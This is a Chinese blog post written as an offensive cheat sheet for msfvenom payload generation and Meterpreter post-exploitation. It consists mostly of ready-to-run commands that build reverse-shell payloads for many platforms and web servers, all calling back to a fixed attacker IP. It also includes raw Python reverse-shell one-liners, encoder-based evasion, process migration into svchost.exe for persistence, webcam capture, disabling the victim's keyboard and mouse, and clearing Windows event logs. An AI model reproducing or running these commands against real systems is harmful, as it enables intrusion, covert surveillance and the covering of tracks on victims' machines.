<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Msfvenmon常用命令/Meterpreter后渗透常用命令, obelia">
    <meta name="description" content="菜🐔一枚，大哥带带？">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Msfvenmon常用命令/Meterpreter后渗透常用命令 | obelia</title>
    <link rel="icon" type="image/png" href="/1.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/1.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">obelia</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/1.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">obelia</div>
        <div class="logo-desc">
            
            菜🐔一枚，大哥带带？
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/15.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Msfvenmon常用命令/Meterpreter后渗透常用命令</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%B7%A5%E5%85%B7/">
                                <span class="chip bg-color">工具</span>
                            </a>
                        
                            <a href="/tags/%E5%86%85%E7%BD%91/">
                                <span class="chip bg-color">内网</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-05-31
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2021-06-01
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.3k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    25 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Meterpreter后渗透常用命令"><a href="#Meterpreter后渗透常用命令" class="headerlink" title="Meterpreter后渗透常用命令"></a>Meterpreter后渗透常用命令</h1><span id="more"></span>
<h2 id="1-前言"><a href="#1-前言" class="headerlink" title="1 前言"></a>1 前言</h2><p>Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统，在远程主机上隐藏自己，它不改变系统硬盘中的文件，因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的，所以跟踪它或者终止它对于一个有经验的人也会变得非常困难</p>
<h2 id="2-文件目录解析"><a href="#2-文件目录解析" class="headerlink" title="2 文件目录解析"></a>2 文件目录解析</h2><p>核心文件包括data、modules、scripts、tools、plugins</p>
<h3 id="2-1-data"><a href="#2-1-data" class="headerlink" title="2.1 data"></a>2.1 data</h3><p>该文件常用功能在woldlist 里面</p>
<h3 id="2-2-modules"><a href="#2-2-modules" class="headerlink" title="2.2 modules"></a>2.2 modules</h3><p>该文件包含了msf最核心的几个文件</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">auxiliary #漏洞辅助模块一般是没有攻击载荷的漏洞攻击
Exploit #渗透攻击模块
st #开发模块
pads #漏洞负载模块
Encode #编码模块
Nops #空指令模块<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-3-scripts"><a href="#2-3-scripts" class="headerlink" title="2.3 scripts"></a>2.3 scripts</h3><p>该文件夹里面包含各种脚本</p>
<h3 id="2-4-tools"><a href="#2-4-tools" class="headerlink" title="2.4 tools"></a>2.4 tools</h3><p>该文件夹中存放着大量的使用脚本</p>
<h3 id="2-5-plugins"><a href="#2-5-plugins" class="headerlink" title="2.5 plugins"></a>2.5 plugins</h3><p>该文件夹放着大量的插件</p>
<h2 id="3-生成木马模块"><a href="#3-生成木马模块" class="headerlink" title="3 生成木马模块"></a>3 生成木马模块</h2><h3 id="3-1-常用参数"><a href="#3-1-常用参数" class="headerlink" title="3.1 常用参数"></a>3.1 常用参数</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">-p # –payload &lt; payload&gt; 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-l # –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all 
-n # –nopsled &lt; length&gt; 为payload预先指定一个NOP滑动长度
-f # –format &lt; format&gt; 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, #–encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码，如果既没用-e选项也没用-b选项，则输出raw payload 
-a # –arch &lt; architecture&gt; 指定payload的目标架构，例如x86 | x64 | x86_64
-–platform &lt; platform&gt; 指定payload的目标平台
-s #–space &lt; length&gt; 设定有效攻击荷载的最大长度，就是文件大小
-b, #–bad-chars &lt; list&gt; 设定规避字符集，指定需要过滤的坏字符例如:不使用 &#39;\x0f&#39;、&#39;\x00&#39;; 
-i # –iterations &lt; count&gt; 指定payload的编码次数
-c #–add-code &lt; path&gt; 指定一个附加的win32 shellcode文件
-x #–template &lt; path&gt; 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k #–keep 保护模板程序的动作，注入的payload作为一个新的进程运行 –payload-options 列举payload的标准选项
-o # –out &lt; path&gt; 指定创建好的payload的存放位置
-v #–var-name &lt; name&gt; 指定一个自定义的变量，以确定输出格式 –shellest 最小化生成payload
-h  # –help 查看帮助选项
–help-formats #查看msf支持的输出格式列表
# ⽐如想查看 windows&#x2F;meterpreter&#x2F;reverse_tcp 支持什什么平台、哪些选项，可以使⽤ msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp --list- options<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-2-几个重要的监听参数"><a href="#3-2-几个重要的监听参数" class="headerlink" title="3.2 几个重要的监听参数"></a>3.2 几个重要的监听参数</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">#防止假session 在实际使用中，会遇到假session 或者刚链接就断开的情况，补充一些参数，防止假死与假session 
msf exploit(multi&#x2F;handler) &gt; set ExitOnSession false &#x2F;&#x2F;可以在接收到seesion后继续监听端口，保持侦听。
#防止session 意外退出
msf5 exploit(multi&#x2F;handler) &gt; set SessionCommunicationTimeout 0 &#x2F;&#x2F;默认情况下，如果一个会话将在5分钟(300秒)没有任何活动，那么它会被杀
死,为防止此情况可将此项修改为0
msf5 exploit(multi&#x2F;handler) &gt; set SessionExpirationTimeout 0 &#x2F;&#x2F;默认情况下，一个星期(604800秒)后，会话将被强制关闭,修改为0可永久不会被关
闭<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-3-handler-后台持续监听"><a href="#3-3-handler-后台持续监听" class="headerlink" title="3.3 handler 后台持续监听"></a>3.3 handler 后台持续监听</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msf exploit(multi&#x2F;handler) &gt; exploit -j -z
#使⽤用 exploit -j -z 可在后台持续监听,-j为后台任务，-z为成功后不不主动发送stage，使⽤用Jobs命令查看和管理理后台任 务。 jobs -K 可结束所有任务。
#快捷建立监听方式
msf5 &gt; handler -H 192.177.113.87 -P 4444 -p windows&#x2F;meterpreter&#x2F;reverse_tcp<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-4-payload-可持续化"><a href="#3-4-payload-可持续化" class="headerlink" title="3.4 payload 可持续化"></a>3.4 payload 可持续化</h3><p>一般来说使用，msfvenom 生成的payload会单独开启一个进程，这种进程很容易被发现和关闭，在后期想做持久化的时候只能再使用migrate</p>
<p>通过生成payload时使用如下命令，payload会直接注入指定进程</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -e x86&#x2F;shikata_ga_nai -b &quot;\x00&quot; -i 5 -a x86 --platform win PrependMigrate&#x3D;ture PrependMigrateProc&#x3D;svchost.exe -f exe -o shell.exe 
#⽣成的shell程序执⾏后会启动两个进程 shell.exe 和 svchost.exe ，关闭其中一个不会影响会话状态。唯一美中不足的是 svchost.exe 不是 system32 目录下的。
#1.PrependMigrate&#x3D;true PrependMigrateProc&#x3D;svchost.exe 使这个程序默认会迁移到svchost.exe进程，⾃己测试的时候不不建议到这个进程⽽是其他的持久进程
#2.使⽤用-p指定使⽤用的攻击载荷模块，使⽤用-e指定使⽤用x86&#x2F;shikata_ga_nai编码器器，使⽤用-f选项告诉MSF编码器器输出格式为exe，-o选项指定输出的文件名为payload.exe，保存在根目录下<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>



<h3 id="3-2-各平台payload-生成"><a href="#3-2-各平台payload-生成" class="headerlink" title="3.2 各平台payload 生成"></a>3.2 各平台payload 生成</h3><h4 id="3-2-1-windows"><a href="#3-2-1-windows" class="headerlink" title="3.2.1 windows"></a>3.2.1 windows</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -a x86 --platform Windows -f exe &gt;shell.exe

msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f exe &gt;shell.exe
#注意：windows下⽣生成32位&#x2F;64位payload时需要注意:以windows&#x2F;meterpreter&#x2F;reverse_tcp为例例，该payload默认为32位，也可使⽤-a x86选项指定。如果要生成64位，则payload为windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="3-2-2-Linux"><a href="#3-2-2-Linux" class="headerlink" title="3.2.2 Linux"></a>3.2.2 Linux</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p linux&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -a x86 --platform Linux -f elf &gt;shell.elf<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-3-Mac"><a href="#3-2-3-Mac" class="headerlink" title="3.2.3 Mac"></a>3.2.3 Mac</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p osx&#x2F;x86&#x2F;shell_reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f -a x86 --platform osx -f macho &gt;shell.macho<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-4-Android"><a href="#3-2-4-Android" class="headerlink" title="3.2.4 Android"></a>3.2.4 Android</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -a dalvik -p android&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw &gt;shell.apk

msfvenom -p android&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 R&gt;shell.apk<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="3-2-5-Powershell"><a href="#3-2-5-Powershell" class="headerlink" title="3.2.5 Powershell"></a>3.2.5 Powershell</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -a x86 -platform windows -p windows&#x2F;poweshell_reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -e cmd&#x2F;powershell_base -f raw -o shell.ps1<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-6-Netcat"><a href="#3-2-6-Netcat" class="headerlink" title="3.2.6 Netcat"></a>3.2.6 Netcat</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">#nc 正向链接
msfvenom -p windows&#x2F;shell_hidden_bind_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f exe &gt;shell.exe
#nc 反向连接
msfvenom -p windows&#x2F;shell_reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f exe &gt;shell.exe<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="3-2-7-基于Linux的shellcode"><a href="#3-2-7-基于Linux的shellcode" class="headerlink" title="3.2.7 基于Linux的shellcode"></a>3.2.7 基于Linux的shellcode</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p linux&#x2F;x86&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -a x86 --platform linux -f c<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-8-基于Windows的shellcode"><a href="#3-2-8-基于Windows的shellcode" class="headerlink" title="3.2.8 基于Windows的shellcode"></a>3.2.8 基于Windows的shellcode</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -a x86 --platform windows -f c<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-9-基于MAC的shellcode"><a href="#3-2-9-基于MAC的shellcode" class="headerlink" title="3.2.9 基于MAC的shellcode"></a>3.2.9 基于MAC的shellcode</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvemom -p osx&#x2F;x86&#x2F;shell_reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -a x86 --platform osx -f c<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-10-Python-反弹shell"><a href="#3-2-10-Python-反弹shell" class="headerlink" title="3.2.10 Python 反弹shell"></a>3.2.10 Python 反弹shell</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p cmd&#x2F;unix&#x2F;reverse_python LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw&gt;shell.py
msfvenom -a python -p python&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw &gt;shell.py<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h4 id="3-2-11-Python正向shell"><a href="#3-2-11-Python正向shell" class="headerlink" title="3.2.11 Python正向shell"></a>3.2.11 Python正向shell</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">#1.
python&#x2F;python3 -c python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.177.113.87&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;bash&quot;,&quot;-i&quot;]);&#39;
#2.
python&#x2F;python3 -c &quot;exec(\&quot;import socket, subprocess;s &#x3D; socket.socket();s.connect((&quot;192.177.113.87&quot;,3333))\n while 1: proc &#x3D; subprocess.Popen(s.recv(1024), shell&#x3D;True, stdout&#x3D;subprocess.PIPE, stderr&#x3D;subprocess.PIPE, stdin&#x3D;subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\&quot;)&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="3-2-12-Bash"><a href="#3-2-12-Bash" class="headerlink" title="3.2.12 Bash"></a>3.2.12 Bash</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p cmd&#x2F;unix&#x2F;reverse_bash LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw &gt; shell.sh<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-13-Perl"><a href="#3-2-13-Perl" class="headerlink" title="3.2.13 Perl"></a>3.2.13 Perl</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p cmd&#x2F;unix&#x2F;reverse_perl LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw &gt; shell.pl<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-14-Lua"><a href="#3-2-14-Lua" class="headerlink" title="3.2.14 Lua"></a>3.2.14 Lua</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p cmd&#x2F;unix&#x2F;reverse_lua LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw &gt; shell.lua<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="3-2-15-Ruby"><a href="#3-2-15-Ruby" class="headerlink" title="3.2.15 Ruby"></a>3.2.15 Ruby</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p ruby&#x2F;shell_reverse_tcp LHOST&#x3D;192.177.113.87 LPORT&#x3D;4444 -f raw &gt; shell.rb<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="3-2-16-Web"><a href="#3-2-16-Web" class="headerlink" title="3.2.16 Web"></a>3.2.16 Web</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">#PHP
msfvenom -p php&#x2F;meterpreter_reverse_tcp LHOST&#x3D;10.211.55.2 LPORT&#x3D;3333 -f raw &gt; shell.php cat shell.php | pbcopy &amp;&amp; echo &#39;&lt;?php &#39; | tr -d &#39;\n&#39; &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php
#ASPX
msfvenom -a x86 --platform windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;10.211.55.2 LPORT&#x3D;3333 -f aspx -o shell.aspx
#ASP
msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;10.211.55.2 LPORT&#x3D;3333 -f asp &gt; shell.asp
#JSP
msfvenom -p java&#x2F;jsp_shell_reverse_tcp LHOST&#x3D;10.211.55.2 LPORT&#x3D;3333 -f raw &gt; shell.jsp
#WAR
msfvenom -p java&#x2F;jsp_shell_reverse_tcp LHOST&#x3D;10.211.55.2 LPORT&#x3D;3333 -f war &gt; shell.war
#nodejs
msfvenom -p nodejs&#x2F;shell_reverse_tcp LHOST&#x3D;10.211.55.2 LPORT&#x3D;3333 -f raw -o shell.js<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="4-系统命令"><a href="#4-系统命令" class="headerlink" title="4 系统命令"></a>4 系统命令</h2><h3 id="4-1-基础系统命令"><a href="#4-1-基础系统命令" class="headerlink" title="4.1 基础系统命令"></a>4.1 基础系统命令</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">search #查找漏洞利用模块
use &lt;name&gt; #使用指定模块
show options #显示所有配置信息
session -s &lt;ID&gt; # 进入会话。- K 杀死会话
background  #当前会话放置后台
run #执行。run后按下俩下 tab，列出已有脚本
info #查看已有模块信息
getuid #查看权限
getpid #查看当前进程的pid
sysinfo #查看目标主机系统信息
ps #查看当前活跃进程 kill &lt;PId&gt; 杀死进程
idletime #查看目标计算机闲置时间
reboot &#x2F; shutdown  #重启&#x2F;关机
shell #进入目标 cmd shel<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-2-开关键盘-鼠标"><a href="#4-2-开关键盘-鼠标" class="headerlink" title="4.2 开关键盘/鼠标"></a>4.2 开关键盘/鼠标</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">uictl [enable&#x2F;disable] [keyboard&#x2F;mouse&#x2F;all] #开启或禁止键盘&#x2F;鼠标<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="4-3-摄像头命令"><a href="#4-3-摄像头命令" class="headerlink" title="4.3 摄像头命令"></a>4.3 摄像头命令</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h3 id="4-4-执行文件"><a href="#4-4-执行文件" class="headerlink" title="4.4 执行文件"></a>4.4 执行文件</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; execute 
Usage: execute -f file [options]
Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a &lt;opt&gt;  The arguments to pass to the command.
    -c        Channelized I&#x2F;O (required for interaction).
    -d &lt;opt&gt;  The &#39;dummy&#39; executable to launch when using -m.
    -f &lt;opt&gt;  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s &lt;opt&gt;  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>例：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="4-5-进程迁移"><a href="#4-5-进程迁移" class="headerlink" title="4.5 进程迁移"></a>4.5 进程迁移</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; migrate
Usage: migrate &lt;&lt;pid&gt; | -P &lt;pid&gt; | -N &lt;name&gt;&gt; [-t timeout]<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>例：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate &lt;pid值&gt;    #将Meterpreter会话移植到指定pid值进程中
kill &lt;pid值&gt;   #杀死进程
注意 只有相同进程权限的启动程序可以注入<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-5-日志清理"><a href="#4-5-日志清理" class="headerlink" title="4.5 日志清理"></a>4.5 日志清理</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">clearev #清除windows中的应用程序日志、系统日志、安全日志，需要管理员权限<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="4-6-基础文件系统命令"><a href="#4-6-基础文件系统命令" class="headerlink" title="4.6 基础文件系统命令"></a>4.6 基础文件系统命令</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">getwd 或者pwd # 查看当前工作目录  
ls
cd
cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
upload &#x2F;tmp&#x2F;hack.txt C:\\lltest  # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt &#x2F;tmp&#x2F; # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件  没有的话，会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2  #只能在当前目录下创建文件夹
rmdir lltest2  #只能删除当前目录下文件夹
getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
lcd &#x2F;tmp   #操作攻击者主机 切换目录<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

